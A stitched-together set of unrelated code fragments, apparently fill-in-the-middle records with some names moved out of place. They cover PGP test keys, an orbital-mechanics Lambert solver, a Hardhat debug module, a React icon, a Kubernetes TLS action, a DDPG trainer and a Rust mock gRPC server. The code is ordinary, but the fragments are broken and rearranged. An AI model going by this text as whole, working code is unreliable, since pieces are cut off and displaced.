xv8AAABSBAAAAAATCCqGSM49AwEHAgME1LRoXSpOxtHXDUdmuvzchyg6005qIBJ4
sfaSxX7QgH9RV2ONUhC+WiayCNADq+UMzuR/vunSr4aQffXvuGnR383/AAAAFDxk
Z2lsQHlhaG9vLWluYy5jb20+wv8AAACGBBATCAA4/wAAAAWCVGvAG/8AAAACiwn/
AAAACZC2VkQCOjdvYf8AAAAFlQgJCgv/AAAAA5YBAv8AAAACngEAAE1BAP0X8veD
24IjmI5/C6ZAfVNXxgZZFhTAACFX75jUA3oD6AEAzoSwKf1aqH6oq62qhCN/pekX
+WAsVMBhNwzLpqtCRjLO/wAAAFYEAAAAABIIKoZIzj0DAQcCAwT50ain7vXiIRv8
B1DO3x3cE/aattZ5sHNixJzRCXi2vQIA5QmOxZ6b5jjUekNbdHG3SZi1a2Ak5mfX
fRxC/5VGAwEIB8L/AAAAZQQYEwgAGP8AAAAFglRrwBz/AAAACZC2VkQCOjdvYQAA
FJAA9isX3xtGyMLYwp2F3nXm7QEdY5bq5VUcD/RJlj792VwA/1wH0pCzVLl4Q9F9
ex7En5r7rHR5xwX82Msc+Rq9dSyO
=7MrZ
-----END PGP PUBLIC KEY BLOCK-----`
const dsaKeyWithSHA512 = `9901a2044f04b07f110400db244efecc7316553ee08d179972aab87bb1214de7692593fcf5b6feb1c80fba268722dd464748539b85b81d574cd2d7ad0ca2444de4d849b8756bad7768c486c83a824f9bba4af773d11742bdfb4ac3b89ef8cc9452d4aad31a37e4b630d33927bff68e879284a1672659b8b298222fc68f370f3e24dccacc4a862442b9438b00a0ea444a24088dc23e26df7daf8f43cba3bffc4fe703fe3d6cd7fdca199d54ed8ae501c30e3ec7871ea9cdd4cf63cfe6fc82281d70a5b8bb493f922cd99fba5f088935596af087c8d818d5ec4d0b9afa7f070b3d7c1dd32a84fca08d8280b4890c8da1dde334de8e3cad8450eed2a4a4fcc2db7b8e5528b869a74a7f0189e11ef097ef1253582348de072bb07a9fa8ab838e993cef0ee203ff49298723e2d1f549b00559f886cd417a41692ce58d0ac1307dc71d85a8af21b0cf6eaa14baf2922d3a70389bedf17cc514ba0febbd107675a372fe84b90162a9e88b14d4b1c6be855b96b33fb198c46f058568817780435b6936167ebb3724b680f32bf27382ada2e37a879b3d9de2abe0c3f399350afd1ad438883f4791e2e3b4184453412068617368207472756e636174696f6e207465737488620413110a002205024f04b07f021b03060b090807030206150802090a0b0416020301021e01021780000a0910ef20e0cefca131581318009e2bf3bf047a44d75a9bacd00161ee04d435522397009a03a60d51bd8a568c6c021c8d7cf1be8d990d6417b0020003`
const unknownHashFunctionHex = `8a00000040040001990006050253863c24000a09103b4fe6acc0b21f32ffff01010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101`
const missingHashFunctionHex = `8a00000040040001030006050253863c24000a09103b4fe6acc0b21f32ffff0101010101010101010101010101010101010101010101010101010101010101010101010101`
const campbellQuine = `a0b001000300fcffa0b001000d00f2ff000300fcffa0b001000d00f2ff8270a01c00000500faff8270a01c00000500faff000500faff001400ebff8270a01c00000500faff000500faff001400ebff428821c400001400ebff428821c400001400ebff428821c400001400ebff428821c400001400ebff428821c400000000ffff000000ffff000b00f4ff428821c400000000ffff000000ffff000b00f4ff0233214c40000100feff000233214c40000100feff0000`
const keyV4forVerifyingSignedMessageV3 = `-----BEGIN PGP PUBLIC KEY BLOCK-----
Comment: GPGTools - https://gpgtools.org
mI0EVfxoFQEEAMBIqmbDfYygcvP6Phr1wr1XI41IF7Qixqybs/foBF8qqblD9gIY
BKpXjnBOtbkcVOJ0nljd3/sQIfH4E0vQwK5/4YRQSI59eKOqd6Fx+fWQOLG+uu6z
tewpeCj9LLHvibx/Sc7VWRnrznia6ftrXxJ/wHMezSab3tnGC0YPVdGNABEBAAG0
JEdvY3J5cHRvIFRlc3QgS2V5IDx0aGVtYXhAZ21haWwuY29tPoi5BBMBCgAjBQJV
/GgVAhsDBwsJCAcDAgEGFQgCCQoLBBYCAwECHgECF4AACgkQeXnQmhdGW9PFVAP+
K7TU0qX5ArvIONIxh/WAweyOk884c5cE8f+3NOPOOCRGyVy0FId5A7MmD5GOQh4H
JseOZVEVCqlmngEvtHZb3U1VYtVGE5WZ+6rQhGsMcWP5qaT4soYwMBlSYxgYwQcx
YhN9qOr292f9j2Y//TTIJmZT4Oa+lMxhWdqTfX+qMgG4jQRV/GgVAQQArhFSiij1
b+hT3dnapbEU+23Z1yTu1DfF6zsxQ4XQWEV3eR8v+8mEDDNcz8oyyF56k6UQ3rXi
UMTIwRDg4V6SbZmaFbZYCOwp/EmXJ3rfhm7z7yzXj2OFN22luuqbyVhuL7LRdB0M
pxgmjXb4tTvfgKd26x34S+QqUJ7W6uprY4sAEQEAAYifBBgBCgAJBQJV/GgVAhsM
AAoJEHl50JoXRlvT7y8D/02ckx4OMkKBZo7viyrBw0MLG92i+DC2bs35PooHR6zz
786mitjOp5z2QWNLBvxC70S0qVfCIz8jKupO1J6rq6Z8CcbLF3qjm6h1omUBf8Nd
EfXKD2/2HV6zMKVknnKzIEzauh+eCKS2CeJUSSSryap/QLVAjRnckaES/OsEWhNB
=RZia
-----END PGP PUBLIC KEY BLOCK-----
`
const signedMessageV3 = `-----BEGIN PGP MESSAGE-----
Comment: GPGTools - https://gpgtools.org
owGbwMvMwMVYWXlhlrhb9GXG03JJDKF/MtxDMjKLFYAoUaEktbhEITe1uDgxPVWP
q5NhKjMrWAVcC9evD8z/bF/uWNjqtk/X3y5/38XGRQHm/57rrDRYuGnTw597Xqka
uM3137/hH3Os+Jf2dc0fXOITKwJvXJvecPVs0ta+Vg7ZO1MLn8w58Xx+6L58mbka
DGHyU9yTueZE8D+QF/Tz28Y78dqtF56R1VPn9Xw4uJqrWYdd7b3vIZ1V6R4Nh05d
iT57d/OhWwA=
=hG7R
-----END PGP MESSAGE-----
`
| {
// dsaKeyWithSHA512 was generated with GnuPG and --cert-digest-algo
// SHA512 in order to require DSA hash truncation to verify correctly.
_, err := ReadKeyRing(readerFromHex(dsaKeyWithSHA512))
if err != nil {
t.Error(err)
}
} |
tools.go | package smd
import (
"errors"
"fmt"
"log"
"math"
"os"
"time"
"github.com/gonum/floats"
"github.com/gonum/matrix/mat64"
)
// TransferType defines the type of Lambert transfer
type TransferType uint8
// Longway returns whether or not this is the long way.
func (t TransferType) Longway() bool {
switch t {
case TType1:
fallthrough
case TType3:
return false
case TType2:
fallthrough
case TType4:
return true
default:
panic(fmt.Errorf("cannot determine whether long or short way for %s", t))
}
}
// Revs returns the number of revolutions given the type.
func (t TransferType) Revs() float64 {
switch t {
case TTypeAuto:
fallthrough // auto-revs is limited to zero revolutions
case TType1:
fallthrough
case TType2:
return 0
case TType3:
fallthrough
case TType4:
return 1
default:
panic("unknown transfer type")
}
}
func (t TransferType) String() string {
switch t {
case TTypeAuto:
return "auto-revs"
case TType1:
return "type-1"
case TType2:
return "type-2"
case TType3:
return "type-3"
case TType4:
return "type-4"
default:
panic("unknown transfer type")
}
}
func TransferTypeFromInt(ttype int) TransferType {
switch ttype {
case 4:
return TType4
case 3:
return TType3
default:
return TTypeAuto
}
}
const (
// TTypeAuto lets the Lambert solver determine the type
TTypeAuto TransferType = iota + 1
// TType1 is transfer of type 1 (zero revolution, short way)
TType1
// TType2 is transfer of type 2 (zero revolution, long way)
TType2
// TType3 is transfer of type 3 (one revolutions, short way)
TType3
// TType4 is transfer of type 4 (one revolutions, long way)
TType4
lambertε = 1e-4 // General epsilon
lambertTlambertε = 1e-4 // Time epsilon
lambertνlambertε = (5e-5 / 180) * math.Pi // 0.00005 degrees
)
// Hohmann computes an Hohmann transfer. It returns the departure and arrival velocities, and the time of flight.
// To get final computations:
// ΔvInit = vDepature - vI
// ΔvFinal = vArrival - vF
func Hohmann(rI, vI, rF, vF float64, body CelestialObject) (vDeparture, vArrival float64, tof time.Duration) {
aTransfer := 0.5 * (rI + rF)
vDeparture = math.Sqrt((2 * body.GM() / rI) - (body.GM() / aTransfer))
vArrival = math.Sqrt((2 * body.GM() / rF) - (body.GM() / aTransfer))
tof = time.Duration(math.Pi*math.Sqrt(math.Pow(aTransfer, 3)/body.GM())) * time.Second
return
}
// Lambert solves the Lambert boundary problem:
// Given the initial and final radii and a central body, it returns the needed initial and final velocities
// along with φ which is the square of the difference in eccentric anomaly. Note that the direction of motion
// is computed directly in this function to simplify the generation of Pork chop plots.
func Lambert(Ri, Rf *mat64.Vector, Δt0 time.Duration, ttype TransferType, body CelestialObject) (Vi, Vf *mat64.Vector, φ float64, err error) {
// Initialize return variables
Vi = mat64.NewVector(3, nil)
Vf = mat64.NewVector(3, nil)
// Sanity checks
Rir, _ := Ri.Dims()
Rfr, _ := Rf.Dims()
if Rir != Rfr || Rir != 3 {
err = errors.New("initial and final radii must be 3x1 vectors")
return
}
Δt0Sec := Δt0.Seconds()
rI := mat64.Norm(Ri, 2)
rF := mat64.Norm(Rf, 2)
cosΔν := mat64.Dot(Ri, Rf) / (rI * rF)
// Compute the direction of motion
νI := math.Atan2(Ri.At(1, 0), Ri.At(0, 0))
νF := math.Atan2(Rf.At(1, 0), Rf.At(0, 0))
dm := 1.0
if ttype == TType2 {
dm = -1.0
} else if ttype == TTypeAuto {
Δν := math.Atan2(Rf.At(1, 0), Rf.At(0, 0)) - math.Atan2(Ri.At(1, 0), Ri.At(0, 0))
if Δν > 2*math.Pi {
Δν -= 2 * math.Pi
} else if Δν < 0 {
Δν += 2 * math.Pi
}
if Δν > math.Pi {
dm = -1.0
} // We don't do the < math.Pi case because that's the initial value anyway.
}
A := dm * math.Sqrt(rI*rF*(1+cosΔν))
if νF-νI < lambertνlambertε && floats.EqualWithinAbs(A, 0, lambertε) {
err = errors.New("cannot compute trajectory: Δν ~=0 and A ~=0")
return
}
φup := 4 * math.Pow(math.Pi, 2) * math.Pow(ttype.Revs()+1, 2)
φlow := -4 * math.Pi
if ttype.Revs() > 0 {
// Generate a bunch of φ
Δtmin := 4000 * 24 * 3600.0
φBound := 0.0
for φP := 15.; φP < φup; φP += 0.1 {
c2 := (1 - math.Cos(math.Sqrt(φP))) / φP
c3 := (math.Sqrt(φP) - math.Sin(math.Sqrt(φP))) / math.Sqrt(math.Pow(φP, 3))
y := rI + rF + A*(φP*c3-1)/math.Sqrt(c2)
χ := math.Sqrt(y / c2)
Δt := (math.Pow(χ, 3)*c3 + A*math.Sqrt(y)) / math.Sqrt(body.μ)
if Δtmin > Δt {
Δtmin = Δt
φBound = φP
}
}
// Determine whether we are going up or down bounds.
if ttype == TType3 {
φlow = φup
φup = φBound
} else if ttype == TType4 {
φlow = φBound
}
}
// Initial guesses for c2 and c3
c2 := 1 / 2.
c3 := 1 / 6.
var Δt, y float64
var iteration uint
for math.Abs(Δt-Δt0Sec) > lambertTlambertε {
if iteration > 1000 {
err = errors.New("did not converge after 1000 iterations")
return
}
iteration++
y = rI + rF + A*(φ*c3-1)/math.Sqrt(c2)
if A > 0 && y < 0 {
tmpIt := 0
for y < 0 {
φ += 0.1
y = rI + rF + A*(φ*c3-1)/math.Sqrt(c2)
if tmpIt > 500 {
err = errors.New("did not converge after 500 attempts to increase φ")
return
}
tmpIt++
}
}
χ := math.Sqrt(y / c2)
Δt = (math.Pow(χ, 3)*c3 + A*math.Sqrt(y)) / math.Sqrt(body.μ)
if ttype != TType3 {
if Δt <= Δt0Sec {
φlow = φ
} else {
φup = φ
}
} else {
if Δt >= Δt0Sec {
φlow = φ
} else {
φup = φ
}
}
φ = (φup + φlow) / 2
if φ > lambertε {
sφ := math.Sqrt(φ)
ssφ, csφ := math.Sincos(sφ)
c2 = (1 - csφ) / φ
c3 = (sφ - ssφ) / math.Sqrt(math.Pow(φ, 3))
} else if φ < -lambertε {
sφ := math.Sqrt(-φ)
c2 = (1 - math.Cosh(sφ)) / φ
c3 = (math.Sinh(sφ) - sφ) / math.Sqrt(math.Pow(-φ, 3))
} else {
c2 = 1 / 2.
c3 = 1 / 6.
}
}
f := 1 - y/rI
gDot := 1 - y/rF
g := (A * math.Sqrt(y/body.μ))
// Compute velocities
Rf2 := mat64.NewVector(3, nil)
Vi.AddScaledVec(Rf, -f, Ri)
Vi.ScaleVec(1/g, Vi)
Rf2.ScaleVec(gDot, Rf)
Vf.AddScaledVec(Rf2, -1, Ri)
Vf.ScaleVec(1/g, Vf)
return
}
// PCPGenerator generates the PCP files to perform contour plots in Matlab (and eventually prints the command).
func PCPGenerator(initPlanet, arrivalPlanet CelestialObject, initLaunch, maxLaunch, initArrival, maxArrival time.Time, ptsPerLaunchDay, ptsPerArrivalDay float64, transferType TransferType, plotC3, verbose, output bool) (c3Map, tofMap, vinfMap map[time.Time][]float64, vInfInitVecs, vInfArriVecs map[time.Time][]mat64.Vector) {
launchWindow := int(maxLaunch.Sub(initLaunch).Hours() / 24) //days
arrivalWindow := int(maxArrival.Sub(initAr | rival).Hours() / 24) //days
// Create the output arrays
c3Map = make(map[time.Time][]float64)
tofMap = make(map[time.Time][]float64)
vinfMap = make(map[time.Time][]float64)
vInfInitVecs = make(map[time.Time][]mat64.Vector)
vInfArriVecs = make(map[time.Time][]mat64.Vector)
if verbose {
log.Printf("[info] %s depart window: %d days\t%s arrival window: %d days\t transfer: %s", initPlanet.Name, launchWindow, arrivalPlanet.Name, arrivalWindow, transferType)
}
// Stores the content of the dat file.
// No trailing new line because it's add in the for loop.
dat := fmt.Sprintf("%% %s -> %s\n%%arrival days as new lines, departure as new columns", initPlanet, arrivalPlanet)
hdls := make([]*os.File, 4)
var fNames []string
if plotC3 {
fNames = []string{"c3", "tof", "vinf", "dates"}
} else {
fNames = []string{"vinf-init", "tof", "vinf-arrival", "dates"}
}
pcpName := fmt.Sprintf("%s-to-%s", initPlanet.Name, arrivalPlanet.Name)
if output {
for i, name := range fNames {
// Write CSV file.
f, err := os.Create(fmt.Sprintf("./contour-%s-%s.dat", pcpName, name))
if err != nil {
panic(err)
}
defer f.Close()
if _, err := f.WriteString(dat); err != nil {
panic(err)
}
hdls[i] = f
}
// Let's write the date information now and close that file.
hdls[3].WriteString(fmt.Sprintf("\n%%departure: \"%s\"\n%%arrival: \"%s\"\n%d,%d\n%d,%d\n", initLaunch.Format("2006-Jan-02"), initArrival.Format("2006-Jan-02"), 1, launchWindow, 1, arrivalWindow))
hdls[3].Close()
}
for launchDay := 0.; launchDay < float64(launchWindow); launchDay += 1 / ptsPerLaunchDay {
// New line in files
if output {
for _, hdl := range hdls[:3] {
if _, err := hdl.WriteString("\n"); err != nil {
panic(err)
}
}
}
launchDT := initLaunch.Add(time.Duration(launchDay*24*3600) * time.Second)
if verbose {
log.Printf("[info] depart %s on %s", initPlanet.Name, launchDT)
}
// Initialize the values
c3Map[launchDT] = make([]float64, arrivalWindow*int(ptsPerArrivalDay+1))
tofMap[launchDT] = make([]float64, arrivalWindow*int(ptsPerArrivalDay+1))
vinfMap[launchDT] = make([]float64, arrivalWindow*int(ptsPerArrivalDay+1))
vInfInitVecs[launchDT] = make([]mat64.Vector, arrivalWindow*int(ptsPerArrivalDay+1))
vInfArriVecs[launchDT] = make([]mat64.Vector, arrivalWindow*int(ptsPerArrivalDay+1))
initOrbit := initPlanet.HelioOrbit(launchDT)
initPlanetR := mat64.NewVector(3, initOrbit.R())
initPlanetV := mat64.NewVector(3, initOrbit.V())
arrivalIdx := 0
for arrivalDay := 0.; arrivalDay < float64(arrivalWindow); arrivalDay += 1 / ptsPerArrivalDay {
arrivalDT := initArrival.Add(time.Duration(arrivalDay*24) * time.Hour)
// Check if this is anachronologic, and if so, skip.
if arrivalDT.Before(launchDT) {
continue
}
arrivalOrbit := arrivalPlanet.HelioOrbit(arrivalDT)
arrivalR := mat64.NewVector(3, arrivalOrbit.R())
arrivalV := mat64.NewVector(3, arrivalOrbit.V())
tof := arrivalDT.Sub(launchDT)
Vi, Vf, _, err := Lambert(initPlanetR, arrivalR, tof, transferType, Sun)
var c3, vInfArrival float64
if err != nil {
if verbose {
fmt.Printf("departure: %s\tarrival: %s\t\t%s\n", launchDT, arrivalDT, err)
}
c3 = math.Inf(1)
vInfArrival = math.Inf(1)
// Store a nil vector to not loose track of indexing
vInfInitVecs[launchDT][arrivalIdx] = *mat64.NewVector(3, nil)
vInfArriVecs[launchDT][arrivalIdx] = *mat64.NewVector(3, nil)
} else {
// Compute the c3
VInfInit := mat64.NewVector(3, nil)
VInfInit.SubVec(initPlanetV, Vi)
// WARNING: When *not* plotting the c3, we just store the V infinity at departure in the c3 variable!
if plotC3 {
c3 = math.Pow(mat64.Norm(VInfInit, 2), 2)
} else {
c3 = mat64.Norm(VInfInit, 2)
}
if math.IsInf(c3, 1) {
c3 = 0
}
// Compute the v_infinity at destination
VInfArrival := mat64.NewVector(3, nil)
VInfArrival.SubVec(Vf, arrivalV)
vInfArrival = mat64.Norm(VInfArrival, 2)
vInfInitVecs[launchDT][arrivalIdx] = *VInfInit
vInfArriVecs[launchDT][arrivalIdx] = *VInfArrival
}
if output {
// Store data in the files
hdls[0].WriteString(fmt.Sprintf("%f,", c3))
hdls[1].WriteString(fmt.Sprintf("%f,", tof.Hours()/24))
hdls[2].WriteString(fmt.Sprintf("%f,", vInfArrival))
}
// and in the arrays
c3Map[launchDT][arrivalIdx] = c3
tofMap[launchDT][arrivalIdx] = tof.Hours() / 24
vinfMap[launchDT][arrivalIdx] = vInfArrival
arrivalIdx++
}
if verbose {
log.Printf("[done] depart %s on %s", initPlanet.Name, launchDT)
}
}
if verbose && output {
// Print the matlab command to help out
if plotC3 {
fmt.Printf("=== MatLab ===\npcpplots('%s', '%s', '%s', '%s')\n", pcpName, initLaunch.Format("2006-01-02"), initArrival.Format("2006-01-02"), arrivalPlanet.Name)
} else {
fmt.Printf("=== MatLab ===\npcpplotsVinfs('%s', '%s', '%s', '%s', '%s')\n", pcpName, initLaunch.Format("2006-01-02"), initArrival.Format("2006-01-02"), initPlanet.Name, arrivalPlanet.Name)
}
}
if verbose {
log.Printf("[done] %s depart window: %d days\t%s arrival window: %d days\t transfer: %s", initPlanet.Name, launchWindow, arrivalPlanet.Name, arrivalWindow, transferType)
}
return
}
|
|
main.go | package main
import (
"fmt"
"../pface"
)
var Plugin MyPlugin
func | () {
// can use init function to do some setup before plugin is executed
Plugin.x = 1
}
type MyPlugin struct {
conf pface.Config
x int
}
func (p *MyPlugin) ID() string {
return "p2"
}
func (p *MyPlugin) Initialize(conf pface.Config) error {
p.conf = conf
return nil
}
func (p *MyPlugin) Run() error {
fmt.Printf("X : %d\n", p.x)
fmt.Printf("App: %s\n", p.conf.AppVersion())
return nil
}
| init |
debug.ts | import { rpcHash } from "../../../core/jsonrpc/types/base-types";
import {
rpcDebugTracingConfig,
RpcDebugTracingConfig,
} from "../../../core/jsonrpc/types/input/debugTraceTransaction";
import { validateParams } from "../../../core/jsonrpc/types/input/validation";
import { MethodNotFoundError } from "../../../core/providers/errors";
import { HardhatNode } from "../node";
import { RpcDebugTraceOutput } from "../output";
/* eslint-disable @nomiclabs/only-hardhat-error */
export class | {
constructor(private readonly _node: HardhatNode) {}
public async processRequest(
method: string,
params: any[] = []
): Promise<any> {
switch (method) {
case "debug_traceTransaction":
return this._traceTransactionAction(
...this._traceTransactionParams(params)
);
}
throw new MethodNotFoundError(`Method ${method} not found`);
}
// debug_traceTransaction
private _traceTransactionParams(
params: any[]
): [Buffer, RpcDebugTracingConfig] {
return validateParams(params, rpcHash, rpcDebugTracingConfig);
}
private async _traceTransactionAction(
hash: Buffer,
config: RpcDebugTracingConfig
): Promise<RpcDebugTraceOutput> {
return this._node.traceTransaction(hash, config);
}
}
| DebugModule |
fast-forward-outline.tsx | import React from 'react'
export const FastForwardOutline = React.memo<React.SVGProps<SVGSVGElement>>(props => (
<svg {...props} xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 24 24" stroke="currentColor"> | <path strokeLinecap="round" strokeLinejoin="round" strokeWidth="2" d="M11.933 12.8a1 1 0 000-1.6L6.6 7.2A1 1 0 005 8v8a1 1 0 001.6.8l5.333-4zM19.933 12.8a1 1 0 000-1.6l-5.333-4A1 1 0 0013 8v8a1 1 0 001.6.8l5.333-4z"/>
</svg>
)) |
|
action_tls_ca_append.go | //
// DISCLAIMER
//
// Copyright 2020-2021 ArangoDB GmbH, Cologne, Germany
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
// Copyright holder is ArangoDB GmbH, Cologne, Germany
//
// Author Adam Janikowski
// Author Tomasz Mielech
//
package reconcile
import (
"context"
"encoding/base64"
meta "k8s.io/apimachinery/pkg/apis/meta/v1"
"github.com/arangodb/kube-arangodb/pkg/util/errors"
"github.com/arangodb/kube-arangodb/pkg/deployment/patch"
"github.com/arangodb/kube-arangodb/pkg/util"
"github.com/arangodb/kube-arangodb/pkg/util/k8sutil"
"k8s.io/apimachinery/pkg/types"
api "github.com/arangodb/kube-arangodb/pkg/apis/deployment/v1"
"github.com/arangodb/kube-arangodb/pkg/deployment/resources"
"github.com/rs/zerolog"
)
func init() {
registerAction(api.ActionTypeAppendTLSCACertificate, newAppendTLSCACertificateAction)
}
func newAppendTLSCACertificateAction(log zerolog.Logger, action api.Action, actionCtx ActionContext) Action {
a := &appendTLSCACertificateAction{}
a.actionImpl = newActionImplDefRef(log, action, actionCtx, operationTLSCACertificateTimeout)
return a
}
type appendTLSCACertificateAction struct {
actionImpl
actionEmptyCheckProgress
}
func (a *appendTLSCACertificateAction) Start(ctx context.Context) (bool, error) {
if !a.actionCtx.GetSpec().TLS.IsSecure() {
return true, nil
}
certChecksum, exists := a.action.Params[checksum]
if !exists {
a.log.Warn().Msgf("Key %s is missing in action", checksum)
return true, nil
}
caSecret, exists := a.actionCtx.GetCachedStatus().Secret(a.actionCtx.GetSpec().TLS.GetCASecretName())
if !exists {
a.log.Warn().Msgf("Secret %s is missing", a.actionCtx.GetSpec().TLS.GetCASecretName())
return true, nil
}
caFolder, exists := a.actionCtx.GetCachedStatus().Secret(resources.GetCASecretName(a.actionCtx.GetAPIObject()))
if !exists |
ca, _, err := resources.GetKeyCertFromSecret(a.log, caSecret, resources.CACertName, resources.CAKeyName)
if err != nil {
a.log.Warn().Err(err).Msgf("Cert %s is invalid", resources.GetCASecretName(a.actionCtx.GetAPIObject()))
return true, nil
}
caData, err := ca.ToPem()
if err != nil {
a.log.Warn().Err(err).Str("secret", resources.GetCASecretName(a.actionCtx.GetAPIObject())).Msgf("Unable to parse ca into pem")
return true, nil
}
caSha := util.SHA256(caData)
if caSha != certChecksum {
a.log.Warn().Msgf("Cert changed")
return true, nil
}
if _, exists := caFolder.Data[caSha]; exists {
a.log.Warn().Msgf("Cert already exists")
return true, nil
}
p := patch.NewPatch()
p.ItemAdd(patch.NewPath("data", caSha), base64.StdEncoding.EncodeToString(caData))
patch, err := p.Marshal()
if err != nil {
a.log.Error().Err(err).Msgf("Unable to encrypt patch")
return true, nil
}
err = k8sutil.RunWithTimeout(ctx, func(ctxChild context.Context) error {
_, err := a.actionCtx.SecretsModInterface().Patch(ctxChild, resources.GetCASecretName(a.actionCtx.GetAPIObject()), types.JSONPatchType, patch, meta.PatchOptions{})
return err
})
if err != nil {
if !k8sutil.IsInvalid(err) {
return false, errors.Wrapf(err, "Unable to update secret: %s", string(patch))
}
}
return true, nil
}
| {
a.log.Warn().Msgf("Secret %s is missing", resources.GetCASecretName(a.actionCtx.GetAPIObject()))
return true, nil
} |
ddpg.py | """Author: Brandon Trabucco, Copyright 2019, MIT License"""
from playground.algorithms.algorithm import Algorithm
import tensorflow as tf
class DDPG(Algorithm):
def __init__(
self,
policy,
target_policy,
qf,
target_qf,
replay_buffer,
reward_scale=1.0,
discount=0.99,
observation_key="observation",
batch_size=32,
update_every=1,
update_after=0,
logger=None,
logging_prefix="ddpg/"
):
# train a policy using the deep deterministic policy gradient
Algorithm.__init__(
self,
replay_buffer,
batch_size=batch_size,
update_every=update_every,
update_after=update_after,
logger=logger,
logging_prefix=logging_prefix)
# each neural network is probabilistic
self.policy = policy
self.target_policy = target_policy
self.qf = qf
self.target_qf = target_qf
# select into the observation dictionary
self.observation_key = observation_key
# control some parameters that are important for ddpg
self.reward_scale = reward_scale
self.discount = discount
def | (
self,
observations,
actions,
rewards,
next_observations,
terminals
):
# select from the observation dictionary
observations = observations[self.observation_key]
next_observations = next_observations[self.observation_key]
# build a tape to collect gradients from the policy and critics
with tf.GradientTape(persistent=True) as tape:
mean_actions, log_pi = self.policy.expected_value(observations)
next_mean_actions, next_log_pi = self.target_policy.expected_value(
next_observations)
# build the q function target value
inputs = tf.concat([next_observations, next_mean_actions], -1)
target_qf_value = self.target_qf(inputs)[..., 0]
self.record("target_qf_value", tf.reduce_mean(target_qf_value).numpy())
qf_targets = tf.stop_gradient(
self.reward_scale * rewards + terminals * self.discount * (
target_qf_value))
self.record("qf_targets", tf.reduce_mean(qf_targets).numpy())
# build the q function loss
inputs = tf.concat([observations, actions], -1)
qf_value = self.qf(inputs)[..., 0]
self.record("qf_value", tf.reduce_mean(qf_value).numpy())
qf_loss = tf.reduce_mean(tf.keras.losses.logcosh(qf_targets, qf_value))
self.record("qf_loss", qf_loss.numpy())
# build the policy loss
inputs = tf.concat([observations, mean_actions], -1)
policy_qf_value = self.qf(inputs)[..., 0]
self.record("policy_qf_value", tf.reduce_mean(policy_qf_value).numpy())
policy_loss = -tf.reduce_mean(policy_qf_value)
self.record("policy_loss", policy_loss.numpy())
# back prop gradients
self.policy.apply_gradients(
self.policy.compute_gradients(policy_loss, tape))
self.qf.apply_gradients(
self.qf.compute_gradients(qf_loss, tape))
# soft update target parameters
self.target_policy.soft_update(self.policy.get_weights())
self.target_qf.soft_update(self.qf.get_weights())
| update_algorithm |
execution_server.rs | use std::collections::VecDeque;
use std::fmt::Debug;
use std::iter::FromIterator;
use std::ops::Deref;
use std::sync::{Arc, Mutex};
use std::thread::sleep;
use std::time::Duration;
use std::time::Instant;
use bazel_protos;
use futures::{Future, Sink};
use grpcio;
use protobuf;
#[derive(Clone, Debug)]
pub struct MockExecution {
name: String,
execute_request: bazel_protos::remote_execution::ExecuteRequest,
operation_responses:
Arc<Mutex<VecDeque<(bazel_protos::operations::Operation, Option<Duration>)>>>,
}
impl MockExecution {
///
/// # Arguments:
/// * `name` - The name of the operation. It is assumed that all operation_responses use this
/// name.
/// * `execute_request` - The expected ExecuteRequest.
/// * `operation_responses` - Vec of Operation response for Execution or GetOperation requests.
/// Will be returned in order.
///
pub fn new(
name: String,
execute_request: bazel_protos::remote_execution::ExecuteRequest,
operation_responses: Vec<(bazel_protos::operations::Operation, Option<Duration>)>,
) -> MockExecution {
MockExecution {
name: name,
execute_request: execute_request,
operation_responses: Arc::new(Mutex::new(VecDeque::from(operation_responses))),
}
}
}
///
/// A server which will answer ExecuteRequest and GetOperation gRPC requests with pre-canned
/// responses.
///
pub struct TestServer {
pub mock_responder: MockResponder,
server_transport: grpcio::Server,
}
impl TestServer {
///
/// # Arguments
/// * `mock_execution` - The canned responses to issue. Returns the MockExecution's
/// operation_responses in order to any ExecuteRequest or GetOperation
/// requests.
/// If an ExecuteRequest request is received which is not equal to this
/// MockExecution's execute_request, an error will be returned.
/// If a GetOperation request is received whose name is not equal to this
/// MockExecution's name, or more requests are received than stub responses
/// are available for, an error will be returned.
pub fn new(mock_execution: MockExecution) -> TestServer {
let mock_responder = MockResponder::new(mock_execution);
let env = Arc::new(grpcio::Environment::new(1));
let mut server_transport = grpcio::ServerBuilder::new(env)
.register_service(bazel_protos::remote_execution_grpc::create_execution(
mock_responder.clone(),
))
.register_service(bazel_protos::operations_grpc::create_operations(
mock_responder.clone(),
))
.bind("localhost", 0)
.build()
.unwrap();
server_transport.start();
TestServer {
mock_responder: mock_responder,
server_transport,
}
}
///
/// The address on which this server is listening over insecure HTTP transport.
///
pub fn address(&self) -> String {
let bind_addr = self.server_transport.bind_addrs().first().unwrap();
format!("{}:{}", bind_addr.0, bind_addr.1)
}
}
impl Drop for TestServer {
fn drop(&mut self) {
let remaining_expected_responses = self
.mock_responder
.mock_execution
.operation_responses
.lock()
.unwrap()
.len();
assert_eq!(
remaining_expected_responses,
0,
"Expected {} more requests. Remaining expected responses:\n{}\nReceived requests:\n{}",
remaining_expected_responses,
MockResponder::display_all(&Vec::from_iter(
self
.mock_responder
.mock_execution
.operation_responses
.lock()
.unwrap()
.clone(),
)),
MockResponder::display_all(
&self
.mock_responder
.received_messages
.deref()
.lock()
.unwrap()
)
)
}
}
#[derive(Clone, Debug)]
pub struct MockResponder {
mock_execution: MockExecution,
pub received_messages: Arc<Mutex<Vec<(String, Box<protobuf::Message>, Instant)>>>,
}
impl MockResponder {
fn new(mock_execution: MockExecution) -> MockResponder {
MockResponder {
mock_execution: mock_execution,
received_messages: Arc::new(Mutex::new(vec![])),
}
}
fn log<T: protobuf::Message + Sized>(&self, message: T) {
